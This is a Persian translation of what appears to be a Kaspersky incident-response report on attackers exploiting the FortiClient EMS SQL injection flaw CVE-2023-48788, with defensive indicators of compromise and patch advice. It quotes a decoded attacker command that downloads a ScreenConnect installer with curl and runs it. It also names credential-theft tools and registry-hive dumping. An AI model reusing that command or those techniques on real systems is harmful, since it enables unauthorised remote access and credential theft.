اکسپلویت آسیب‌پذیری FortiClient EMS در محیط بیرون

توسط مدیر محتوا اخبار و مقالات امنیت اطلاعات, مقالات Artificial Inteligence, Kaspersky, machine learning, malware, Trojan, بدافزار, مسمومیت داده, هوش مصنوعی, کسپرسکی

در جریان واکنش به رخداد اخیر، تیم GERT شرکتکسپرسکیمجموعه‌ای از تکنیک‌ها، تاکتیک‌ها و شاخص‌های مرتبط با مهاجمی را شناسایی کرد که با استفاده از یک آسیب‌پذیری در Fortinet، به شبکه‌های شرکتی نفوذ کرده بود؛ این در حالی است که برای این آسیب‌پذیری پیش‌تر پچی در دسترس قرار گرفته بود. با ما همراه شوید تا این موضوع را با هم بررسی کنیم.

این آسیب‌پذیری ناشی از فیلترگذاری نادرست ورودی‌های دستورات SQL است که سیستم را در برابر حمله تزریق SQL آسیب‌پذیر می‌کند. این مشکل به طور خاص نسخه‌های Fortinet FortiClient EMS 7.0.1 تا 7.0.10 و 7.2.0 تا 7.2.2 را تحت تأثیر قرار می‌دهد. در صورت اکسپلویت موفقیت‌آمیز، این آسیب‌پذیری به مهاجمین اجازه می‌دهد تا با ارسال بسته‌های داده‌ای خاص، کد یا دستورات غیرمجاز را اجرا کنند.سیستم تحت تأثیر یک سرور ویندوزی بود که در معرض اینترنت قرار داشت و تنها دارای دو پورت باز بود. شرکت مورد هدف از این فناوری برای دانلود سیاست‌های مشخص به دستگاه‌های شرکتی کارکنان خود استفاده می‌کند و از این طریق دسترسی امن به VPN شرکت Fortinet را فراهم می‌سازد.

شناسایی و مهار تهدید

در اکتبر 2024، هشدارهای تله‌متری از فناوری MDR (تشخیص و پاسخ مدیریت‌شده) ما نشان دادند که تلاش‌هایی از یک آدرس IP داخلی برای دسترسی به هایوهای رجیستری از طریق یک حساب کاربری ادمین در سرور ویندوز مشتری انجام شده است. آدرس IP مبدأ این درخواست‌ها بخشی از شبکه مشتری بود، اما بر اساس ارزیابی مشتری، تحت پوشش راهکار MDR قرار نداشت. این تلاش‌ها همچنین منابع اشتراکی مدیریتی زیر را هدف قرار داده بودند:

\\192.168.X.X\C$\Users
\\192.168.X.X\C$\
\\192.168.X.X\IPC$\srvsvc
\\192.168.X.X\IPC$\svcctl
\\192.168.X.X\IPC$\winreg
\\192.168.X.X\ADMIN$\SYSTEM32\WqgLtykM.tmp
\\192.168.X.X\C$\Windows\System32\Microsoft\Protect\DPAPI Master Keys
\\192.168.X.X\C$\Windows\System32\Microsoft\Protect\User Keys
\\192.168.X.X\C$\Windows\System32\Microsoft\Protect\Protected Credentials

در سطح لوکال، روی ماشینی که آدرس IP آن به خطر افتاده بود، چندین تلاش برای تخلیههایوهای رجیستری HKLM\SAM و HKLM\SECURITY از طریق سرویس رجیستری از راه دور انجام شد.

شواهد و تجزیه‌وتحلیل بردار اولیه حمله

شواهد همچنین وجود چندین تلاش ناموفق برای ورود به سیستم را تأیید کردند که توسط فناوری MDR کسپرسکی گزارش شده بود. این تلاش‌ها از همان آدرس IP داخلی در چندین میزبان مختلف با استفاده از حساب کاربری ادمین انجام شده بودند.

تجزیه‌وتحلیل و بُردار اولیه حمله:
با جمع‌آوری شواهد مربوط به فعالیت‌های از راه دور ذکرشده از سرور منبع، تأیید شد که این سرور در معرض اینترنت قرار داشت و دارای دو پورت باز مرتبط با FortiClient EMS بود. شواهد موجود در فایل سیستم تأیید کردند که ابزارهای نظارت و مدیریت از راه دور (RMM) مانند ScreenConnectو AnyDeskاجرا شده‌اند.

با توجه به استفاده از فناوری FortiClient EMS، مشخص شد که نسخه نصب‌شده (7.01) در برابر CVE-2023-48788 آسیب‌پذیر است. بنابراین لازم بود شواهد بیشتری از لاگ‌های سیستم جمع‌آوری شده تا آثار احتمالی اکسپلویت بررسی شوند.

مسیرهای کلیدی برای بررسی لاگ‌ها

FortiClient Log-\*

C:\Program Files\Fortinet\FortiClientEMS\logs

فایل‌های مربوطه:

ems.log: لاگ اصلی برای FortiClient EMS است که می‌تواند به رفتارهای غیرعادی، خطاهای پایگاه‌داده، دسترسی‌های غیرمجاز یا تلاش‌های تزریق اشاره کند.

sql_trace.log یا فایل‌های مشابه: اگر این فایل وجود داشته باشد، ممکن است اطلاعات دقیقی درباره جست‌وجو‌های SQL اجراشده ارائه دهد. این لاگ را می‌توان برای بررسی کوئری‌های غیرمنتظره یا مخدوش بررسی کرد که می‌توانند نشان‌دهنده تلاش برای تزریق SQL باشند.

لاگ‌های MS SQL

– C:\Program Files\Microsoft SQL

Server\MSSQL14.FCEMS\MSSQL\Log\*
این لاگ‌ها مربوط به MS SQL Server هستند که توسط FortiClient EMS استفاده می‌شود.

در میان فایل‌های ERRORLOG موجود در مسیر دوم، شواهدی از یک تزریق SQL (SQL Injection) که توسط مهاجم با موفقیت انجام شده بود، در فایل ERRORLOG.X کشف شد.

ما شواهدی از یک SQL Injectionرا که مهاجم با موفقیت انجام داده بود، در یکی از فایل‌های ERRORLOGدر مسیر زیر کشف کردیم:

C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Log\ERRORLOG.X

با بررسی داده‌های تله‌متریکسپرسکی مرتبط با همان بردار، کارشناسان GERT توانستند دستورات اجراشده توسط مهاجمین را شناسایی کنند. این دستورات در یک URL کدگذاری‌شده به‌صورت Base64قرار داشتند که با فعالیت‌های مشاهده‌شده در سیستم تحلیل‌شده تطابق داشت.

این شناسایی نشان‌دهنده آن است که مهاجمین از تکنیک‌های پیشرفته‌ای مانند کدگذاری Base64 برای مخفی کردن دستورات مخرب خود استفاده کرده‌اند. روش مذکور معمولاً برای دور زدن سیستم‌های شناسایی و تحلیل امنیتی به کار می‌رود.

کدِ کدگشایی‌شده به شرح زیر است:

curl -o C:\update.exe

“https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access

&y=Guest” & start /B C:\update.exe

مهاجمین از دستور curl جهت دانلود یک نصب‌کننده برای برنامه دسترسی از راه دور ScreenConnect استفاده کردند. ما همچنین استفاده از certutil باینری بومی ویندوز را برای همین منظور مشاهده کردیم. نصب‌کننده به عنوان update.exe در ریشه درایو C ذخیره و سپس در پس زمینه اجرا می‌شود. با قضاوت بر اساس پارامتر y=Guest در جستار URL، مهاجمین ظاهراً به مجوز آزمایشی ScreenConnect متکی بودند.

ما متوجه شدیم که پس از نصب اولیه، مهاجمین از طریق ابزار کنترل از راه دور AnyDesk شروع به آپلود محموله‌های اضافی در سیستم در معرض خطر، برای شروع فعالیت‌های کشف و حرکت جانبی، مانند شمارش منابع شبکه، تلاش برای به دست آوردن اعتبار، انجام تکنیک‌های فرار تدافعی و ایجاد نوع دیگری از پایداری کردند.

شمارش منابع شبکه

netscan.exe;
net;
net/dat.txt;
net/libsmb2.dll;
net/libsmi2.dll;
net/netscan.exe;
net/netscanold.xml;
net/unins000.dat;
net/unins000.exe.

سرقت اطلاعات

webbrowserpassview.exe :یک ابزار بازیابی رمز عبور که رمزهای عبور ذخیره‌شده در اینترنت اکسپلورر (نسخه 4.0 تا 11.0)، موزیلا فایرفاکس (همه نسخه‌ها)، گوگل کروم، سافاری و اپرا را نشان می‌دهد.
netpass64.exe: ابزار بازیابی پسورد
mimikatz.exe

فرار تدافعی: مهاجمین از ابزار HRSword.exe (Huorong Internet Security) برای اجرای تکنیک‌های فرار تدافعی استفاده کردند.

انی‌دسک: این ابزار امکان دسترسی و کنترل دستگاه‌ها را از راه دور فراهم می‌کند.

پس از تأیید موفقیت در اکسپلویت، موفق به جمع‌آوری شواهد اضافی شدیم. با تجزیه و تحلیل گزارش‌های AnyDesk، توانستیم آدرس IP مورد استفاده در نفوذ را دریافت کنیم. بر اساس منابع اطلاعاتی تهدیدات سایبری، این آدرس IP متعلق به منطقه روسیه و به عنوان بخشی از یک شبکه مرتبط با یک کمپین مخرب که از Cobalt Strike سوء استفاده کرده است، پرچم‌گذاری شده است.

تجزیه و تحلیل داده‌های تله متری برای موارد مشابه مرتبط با تهدید

داده‌های تله‌متری ما نشان داد که عوامل تهدید شرکت‌های مختلف را هدف قرار داده‌اند و به طور مداوم زیر دامنه‌های ScreenConnect را عوض کرده و ظاهراً آنها را بدون توجه به هدف خاص تغییر می‌دهند. علاوه بر رفتار فوق، کارشناسان GERT تلاش هایی را برای دانلود و اجرای بارهای مختلف از منابع خارجی طبقه بندی‌نشده اضافی که در سایر رخدادهای اکسپلویتی استفاده شده بود، مشاهده کردند. این به شدت نشان می‌دهد مهاجمینِ دیگری از همان آسیب‌پذیری با یک بار مرحله دوم متفاوت با هدف چندین هدف سوء استفاده کرده‌اند. در مورد مناطق و کشورهایی که تحت تأثیر تلاش‌ها برای بهره‌برداری از این آسیب‌پذیری با سایر محموله‌ها قرار گرفته‌اند، می‌توانیم تأیید کنیم که این تهدید مکان‌های خاصی را هدف قرار نمی‌دهد، هرچند ما یک سوگیری جزئی نسبت به آمریکای جنوبی مشاهده کرده‌ایم (۵ حمله از ۱۵ حمله).

رویکرد همیشه در حال رشدِ سوءاستفاده از این آسیب‌پذیری در رخدادهای مشابه

گرچه بیشتر این تهدید را در 23 اکتبر 2024 دنبال می‌کردند، اما تحلیلگران GERT تلاش‌های فعالی برای سوء استفاده از CVE-2023-48788 در طبیعت با اجرای دستوری مشابه شناسایی کردند. در آن مرحله، این فعالیت شامل یک سرویس رایگان ارائه شده توسط دامنه webhook.site می‌شد.

وقتی رمزگشایی شد، کاشف بعمل آمد یک زنجیره فرمان با یک فرمان نهایی PS1 در آن بوده. طبق اطلاعات بدست آمده این سرویس آدرس‌های اینترنتی و آدرس‌های ایمیل رایگان و منحصربه‌فرد ایجاد می‌کند و به شما امکان می‌دهد فوراً هر چیزی را که به آنجا ارسال می‌شود ببینید. منحصر به فرد بودن توسط یک توکن تولید شده در URL، آدرس ایمیل یا دامنه DNS تضمین می‌شود. کاربران می‌توانند این سرویس را به صورت رایگان فعال یا خدمات و ویژگی های اضافی را با پرداخت هزینه اضافه کنند. کارشناسان GERT تأیید کردند که عامل تهدید از این سرویس برای جمع‌آوری پاسخ‌ها از اهداف آسیب‌پذیر در حین انجام اسکن سیستم‌های تحت تأثیر آسیب‌پذیری FortiClient EMS استفاده می‌کرد. با دانستن توکن webhook.site خاص مورد استفاده مهاجمین، توانستیم 25 درخواست به webhook.site را در مدت پنج ساعت در تاریخ 23 اکتبر شناسایی کنیم. از این تعداد، 22 درخواست از IP های منبع مشخص اهداف آسیب‌پذیر واقع در 18 کشور مختلف نشأت گرفته‌اند.

سه درخواست از همان آدرس IP 135.XXX.XX.47 واقع در آلمان و میزبانی Hetzner Online GmbH نشأت گرفته است. این IP بدنام و در اکتبر و نوامبر سال گذشته با تهدید infodealer همراه بوده، اگرچه مطمئن نیستیم این آدرس توسط عامل تهدید مورد سوء استفاده قرار گرفته باشد یا بخشی از شبکه آنها باشد. این میزبان پورت های باز 80 و 7777 را با سرویس HTTP در پورت 80 و سرویس SSL در پورت 7777 نشان می دهد. رابط وب برای PRTG Network Monitor 24.1.92.1554 x64 در پورت 80 میزبانی می‌شود که به نظر می‌رسد پیکربندی پیش‌فرض و مجوز آزمایشی رایگان PRTG است که در 24 اکتبر 2020 منقضی شده است.

نام رایج گواهی SSL در پورت 7777 WIN-LIVFRVQFMKO است. تجزیه و تحلیل اطلاعات تهدید نشان داده است که این میزبان اغلب توسط عوامل تهدید مختلف، از جمله گروه‌های باج‌افزار Conti و LockBit استفاده می‌شود. با این حال، می‌تواند نام میزبان پیش‌فرض الگوی سیستم عامل ویندوز باشد که توسط ارائه‌دهنده میزبانی Hetzner استفاده می‌شود. تلاش‌های موفق متعدد برای دسترسی به webhook.site و چندین تغییر مشکوک کشف‌شده در محتوای HTTP POST، تحلیلگران GERT را به این باور رساند که این میزبان می‌تواند یک “نصب PRTG منسوخ” باشد که به نوعی توسط مهاجم در معرض خطر و کنترل قرار گرفته و برای آزمایش سرویس ارائه شده توسط webhook.site استفاده می‌شود.

نتیجه‌گیری

نتیجه گیری

تجزیه و تحلیل این رخداد به ما کمک کرد تا مشخص کنیم تکنیک‌هایی که در حال حاضر توسط مهاجمین برای استقرار ابزارهای دسترسی از راه دور استفاده می‌شوند، دائماً به‌روزرسانی شده و پیچیدگی آن‌ها افزایش می‌یابد. اگرچه آسیب‌پذیری مورد بحث (CVE-2023-48788) در زمان حملات اصلاح شده بود، اما پیشنهاد ما این است که چندین عامل تهدید قادر به سوء استفاده از آن بوده و تعداد زیادی از کاربران در مناطق مختلف را به خطر بیندازند.

این را واضحاً اعلام کنیم که فناوری‌ها باید مداوم به نسخه‌های 7.0.11-7.0.13 یا 7.2.3 و نسخه‌های بعدی در مورد FortiClient EMS به روزرسانی شوند؛ در غیر صورت هنوز می‌توان انتظار یک بردار اولیه را داشت. برای یک رخداد سایبری اجرای اعلان‌های هشدار و مدیریت پچ برای هر برنامه‌ای با دسترسی عمومی مستقیم یا غیرمستقیم، فرآیند به‌روزرسانی منظم را تکمیل می‌کند. شایان ذکر است که پیاده‌سازی MDR بر روی کامپیوترهای مجاور بردار اولیه قادر به شناسایی و مسدود کردن مهاجمان به موقع بوده و مانع از دستیابی آنها به اهداف نهایی یا ایجاد تأثیرات عمده در محیط قربانی می‌شود. همچنین، نصب عواملی که دائماً تهدیدها را بر روی رایانه‌ها نظارت و شناسایی می‌کنند، می‌تواند یک عامل کلیدی در مهار تهدید در طول یک رخداد باشد.

شاخص‌های دستکاری

اپ‌ها/فایل‌نیم‌های رخداد

C:\update.exe
HRSword.exe
Mimik!!!.exe
br.exe
donpapi.exe
netpass64.exe
webbrowserpassview.exe
netscan.exe
connectwise / ScreenConnect
AnyDesk

هش- SHA1 از رخداد

8cfd968741a7c8ec2dcbe0f5333674025e6be1dc
441a52f0112da187244eeec5b24a79f40cc17d47
746710470586076bb0757e0b3875de9c90202be2
bc29888042d03fe0ffb57fc116585e992a4fdb9b
73f8e5c17b49b9f2703fed59cc2be77239e904f7
841fff3a36d82c14b044da26967eb2a8f61175a8
34162aaf41c08f0de2f888728b7f4dc2a43b50ec
cf1ca6c7f818e72454c923fea7824a8f6930cb08
e3b6ea8c46fa831cec6f235a5cf48b38a4ae8d69
59e1322440b4601d614277fe9092902b6ca471c2
75ebd5bab5e2707d4533579a34d983b65af5ec7f
83cff3719c7799a3e27a567042e861106f33bb19
44b83dd83d189f19e54700a288035be8aa7c8672
8834f7ab3d4aa5fb14d851c7790e1a6812ea4ca8

دامنه‌ها/ آدرس‌های آی‌پیِ رخداد

45.141.84[.]45
infinity.screenconnect[.]com
kle.screenconnect[.]com
trembly.screenconnect[.]com
corsmich.screenconnect[.]com

دامنه‌ها/ آدرس‌های آی‌پیِ سایر پی‌لودهای مخربِ کشف شده

آبادیس (نمایندگی فروش محصولات کسپرسکی)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز میشناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.

بلاگ

اکسپلویت آسیب‌پذیری FortiClient EMS در محیط بیرون

اشتراک گذاری پست

نویسنده

نوشته‌های مرتبط